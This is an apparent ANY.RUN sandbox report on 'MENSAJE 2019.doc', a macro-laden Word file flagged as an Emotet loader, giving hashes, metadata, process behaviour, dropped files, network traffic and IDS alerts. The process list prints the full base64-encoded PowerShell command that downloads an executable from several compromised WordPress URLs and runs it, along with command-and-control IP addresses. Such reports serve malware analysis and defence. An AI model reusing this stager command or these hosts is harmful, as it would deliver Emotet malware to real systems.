analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

MENSAJE 2019.doc

Full analysis: https://app.any.run/tasks/ce1a0d44-b0de-4477-9145-4869d23eb6f3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 07:31:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: US Dollar, Subject: Incredible Fresh Towels, Author: Jackeline Hermann, Keywords: Industrial, Movies & Baby, Comments: invoice, Template: Normal.dotm, Last Saved By: Kathryne Rempel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 07:39:00 2019, Last Saved Time/Date: Fri Oct 11 07:39:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 175, Security: 0
MD5:

6237A0456EC1A0EE83ACB018CA19381F

SHA1:

C0B910D8211AE8AB174E8BB442A1A242EC1500F2

SHA256:

D72443E1E19BB9C72C01CB339BF8404DF43445442F619A51979CC52F3613B5AB

SSDEEP:

3072:X1a3bgBAeOY5CTsdASUObYJ0m9zGAkbtO2lY2Go//6rGHsrw9sSJ6wKlutfMV:X1a3bgBrba0dRx//MGHsrksSJ69q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 539.exe (PID: 4076)
      • 539.exe (PID: 2988)
      • msptermsizes.exe (PID: 4092)
      • msptermsizes.exe (PID: 2660)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2712)
    • Emotet process was detected

      • 539.exe (PID: 2988)
    • Connects to CnC server

      • msptermsizes.exe (PID: 4092)
    • EMOTET was detected

      • msptermsizes.exe (PID: 4092)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2712)
    • PowerShell script executed

      • powershell.exe (PID: 2712)
    • Creates files in the user directory

      • powershell.exe (PID: 2712)
    • Application launched itself

      • 539.exe (PID: 4076)
      • msptermsizes.exe (PID: 2660)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2712)
      • 539.exe (PID: 2988)
    • Starts itself from another location

      • 539.exe (PID: 2988)
    • Connects to server without host name

      • msptermsizes.exe (PID: 4092)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1096)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1096)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 2712)
      • 539.exe (PID: 2988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: US Dollar
Subject: Incredible Fresh Towels
Author: Jackeline Hermann
Keywords: Industrial, Movies & Baby
Comments: invoice
Template: Normal.dotm
LastModifiedBy: Kathryne Rempel
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:11 06:39:00
ModifyDate: 2019:10:11 06:39:00
Pages: 1
Words: 30
Characters: 175
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Roberts LLC
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 204
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Runte
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 539.exe no specs #EMOTET 539.exe msptermsizes.exe no specs #EMOTET msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
1096"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\MENSAJE 2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2712powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADQAMABiADQAOQA4ADAANwA4ADAAMwAwAD0AJwB4ADcAMwBiADUAMwA1ADIAMAA0ADYAMQAnADsAJABjAGMAYgAzAHgAMgAxADYANwBiADYAMQAgAD0AIAAnADUAMwA5ACcAOwAkAHgANwA4ADAAMwB4AHgANAAxADgAMAAwAD0AJwBiADgAMwAwADAANAA1AGMAYwAwADUAYwAnADsAJABjADcANgAwADAAOQAwADQAMAA1ADcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAYwBiADMAeAAyADEANgA3AGIANgAxACsAJwAuAGUAeABlACcAOwAkAGMAMAA2AGIANQB4ADgAMQA5ADAAeAA2AGMAPQAnAGIANQA0ADAAMAA0ADAAMQAyADcAMAAnADsAJABiADQAMgAwADMAMAA2ADYAOAAxADUAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAYwBMAGkAZQBuAHQAOwAkAGMAMgAwADEANgAxAGMAOAA3ADEAMQA2AD0AJwBoAHQAdABwADoALwAvAHQAaABpAGoAcwBtAG8AcgBsAGkAbwBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBoADUAMgAwADcANwAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBnAGkAbwBpAGcAYQBzAC4AYwBvAG0ALwBMAG8AZwBpAG4ALwAxAGcAOQA4AC8AKgBoAHQAdABwADoALwAvAHkAeQA2ADIANgAyAC4AYwBvAG0ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAGgANgA3ADAALwAqAGgAdAB0AHAAOgAvAC8AdABoAGUAbgBlAHcAcwA0AHYAaQBlAHcAcwAuAGMAbwBtAC8AOQBtAGMAbQBuAHAAMwAvADIAaQAzADYALwAqAGgAdAB0AHAAOgAvAC8AcQB1AGUAZQBuAGkAZQBrAGEAdwBhAGIAZQAuAGMAbwBtAC8AYQBsAGwAXwBwAGgAbwB0AG8AcwAvADQAZQBsADcANQAvACcALgAiAHMAcABsAGAASQB0ACIAKAAnACoAJwApADsAJABiADAANQBjADAAYwA5ADMAYwAwADUANwAwAD0AJwBiADAANAAxADEAeAA5ADMAYgAxADEANQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4AHgAeABiADAANABiAGIAOAAzADMANQAwACAAaQBuACAAJABjADIAMAAxADYAMQBjADgANwAxADEANgApAHsAdAByAHkAewAkAGIANAAyADAAMwAwADYANgA4ADEANQAuACIAZABgAG8AVwBOAEwAbwBgAEEARABGAGAASQBsAEUAIgAoACQAeAB4AHgAYgAwADQAYgBiADgAMwAzADUAMAAsACAAJABjADcANgAwADAAOQAwADQAMAA1ADcAKQA7ACQAYgA3ADAAMAAwADAANQAwADgAeAA1AD0AJwBiADAAMwBjAHgAMAAwADQAMQA4ADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABjADcANgAwADAAOQAwADQAMAA1ADcAKQAuACIATABFAE4AYABHAHQAaAAiACAALQBnAGUAIAAzADUAOAA2ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQByAHQAIgAoACQAYwA3ADYAMAAwADkAMAA0ADAANQA3ACkAOwAkAGIAMAA5ADgAMAAwADAANAAwADcAMAA3AD0AJwB4ADAAYwAwADIANQAwADEAMABiADUAYgA5ACcAOwBiAHIAZQBhAGsAOwAkAGMAYwB4AHgANABiADAAMAA0ADgAeAA9ACcAYwA5ADEANAA5AHgAMwA1ADUAeAA2ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAeAA3AGMAOQB4AGMAYgAwADQAMAA2ADgAPQAnAGMAOQBiADEAYgA2ADEAMQAwAHgANAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4076"C:\Users\admin\539.exe" C:\Users\admin\539.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2988--7e1512f9C:\Users\admin\539.exe
539.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2660"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe539.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4092--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 222
Read events
1 407
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
1096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA785.tmp.cvr
MD5:
SHA256:
2712powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YDATQVDVNH5OHHVGZLZS.temp
MD5:
SHA256:
1096WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D57827BD.wmfwmf
MD5:834C79652706C8331818AA79077B2853
SHA256:49095F07E813FF26F29B6AD6DCB9A45707DD1D1BD37AF80253875712F2C4F210
1096WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF9F33AC.wmfwmf
MD5:92876B3D5CC66EC034DFD0465E23DE87
SHA256:885A89B8E9E16EE98EE963D807F72E4CD8D420E0A7F6B699E7899D467DC729D0
1096WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9864529A.wmfwmf
MD5:FD7E1FA1F46D7CD3D93927983C6F84CA
SHA256:3883FBAF2679D568985A352661BEBB3BA63998EF64001FA0D95EA72F095C8DF2
1096WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88D9DA59.wmfwmf
MD5:F9031FD21DA0F51C35FBE71607F5A358
SHA256:8692BDE0A063FDD08FB894EAE119C2C117E151A493EB3062D6EE99104A28E792
1096WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$NSAJE 2019.docpgc
MD5:0D223CDC4D61C634836B8988A13575C1
SHA256:F75D19CE436D2ED183716DE5904560F3B61F5B885ABE8279815E2F1EBF3A6ECC
1096WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3316C8B5.wmfwmf
MD5:C05A6D1B58DCBDC99CE474C796955CF2
SHA256:BBA0E7A68F2510339998D1EDBEC5439FB6FBDA54016BAFA686C370397A18229B
1096WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FB345B8.wmfwmf
MD5:949B6197A7EAAAB2ACD91975E8F2760D
SHA256:4D57682049C9F60F6ACF577C6A5AC2F0795D925B1DC784CE2EFB08E14E2AE5EA
2712powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4092
msptermsizes.exe
POST
191.82.16.60:80
http://191.82.16.60/child/enabled/
AR
malicious
2712
powershell.exe
GET
200
185.87.187.138:80
http://thijsmorlion.com/wp-admin/h52077/
NL
executable
284 Kb
suspicious
4092
msptermsizes.exe
POST
404
110.36.234.146:80
http://110.36.234.146/ringin/
PK
html
166 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4092
msptermsizes.exe
110.36.234.146:80
National WiMAX/IMS environment
PK
malicious
4092
msptermsizes.exe
191.82.16.60:80
Telefonica de Argentina
AR
malicious
2712
powershell.exe
185.87.187.138:80
thijsmorlion.com
Astralus B.V.
NL
suspicious

DNS requests

Domain
IP
Reputation
thijsmorlion.com
  • 185.87.187.138
suspicious

Threats

PID
Process
Class
Message
2712
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2712
powershell.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
2712
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2712
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
4092
msptermsizes.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 2
4092
msptermsizes.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
4092
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
2 ETPRO signatures available at the full report
No debug info